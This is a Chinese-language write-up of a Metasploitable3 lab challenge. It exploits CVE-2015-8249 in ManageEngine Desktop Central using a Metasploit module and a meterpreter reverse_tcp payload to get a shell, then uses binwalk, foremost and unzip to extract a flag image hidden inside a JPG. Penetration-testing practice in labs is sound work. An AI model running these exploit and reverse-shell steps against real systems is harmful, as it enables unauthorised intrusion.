Metasploitable3-Ace of Hearts 第八个flag
这是第八个flag.
结合之前的信息搜集,我们打开nessus的扫描报告
CVE-2015-8249
ZOHOManageEngineDesktopCentral(DC)是美国卓豪(ZOHO)公司的一套桌面管理解决方案。该方案包含软件分发、补丁管理、系统配置、远程控制等功能模块,可对桌面机以及服务器管理的整个生命周期提供支持。ZOHOManageEngineDC9版本中的FileUploadServlet类存在安全漏洞。远程攻击者可借助‘ConnectionId’参数利用该漏洞上传和执行任意的文件。
这一次准备用ManageEngine Desktop Central这个版本对应的漏洞了。
用浏览器打开相关网页
启动msf,搜索相应的漏洞利用模块,CVE-2015-8249
use exploit/windows/http/manageengine_connectionid_write
show options
set rhost 192.168.0.100
show payloads
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.0.108
由于我的靶机对应的目标端口是8022,不是默认的8020,所以第一次没意识到这一点,攻击失败
第二次修改一下对应的端口,set rport 8022
exploit
拿到shell了
提权不成功
直接找flag,
flag都是在User目录里面的,我现在先切换到user目录下,再用search命令查询Ace_of_Heart
没找到,只好根据先前的经验找了
最后我在C:\Users\Public\Pictures这个目录下找到
ace_of_hearts.jpg这个文件,居然是.jpg格式的。(捂脸)
先把它下载到本地
打开我的用户目录
它就在那里,双击打开
但这不是我们要找的红心A,在前面我找的几个flag都是png格式的,而这个是.jpg格式的
所以我需要用hexeditor将它打开分析一下
但是令我失望的是,没有什么异常的地方
我只好上另外一个kali里面专门对付隐写的工具
binwalk
binwalk是一个固件分析工具,旨在协助研究人员对固件非分析,提取及****用处。简单易用,完全自动化脚本,并通过自定义签名,提取规则和插件模块,还重要的一点的是可以轻松地扩展。
binwalk ace_of_hearts.jpg
果然内有乾坤
使用foremost工具将图片分离出来
foremost这个工具在分离图片完成后,会将处理完的文件放在它自动生成的output文件夹中,现在只要找到它进入。
另外一个办法就是将ace_of_hearts.jpg重命名为zip文件,因为刚才binwalk分析它的文件里面有zip压缩包
cp ace_of_hearts.jpg ace_of_hearts.zip
unzip ace_of_hearts.zip
ace_of_hearts.png解压出来了
最后就是display ace_of_hearts.png
将其显示出来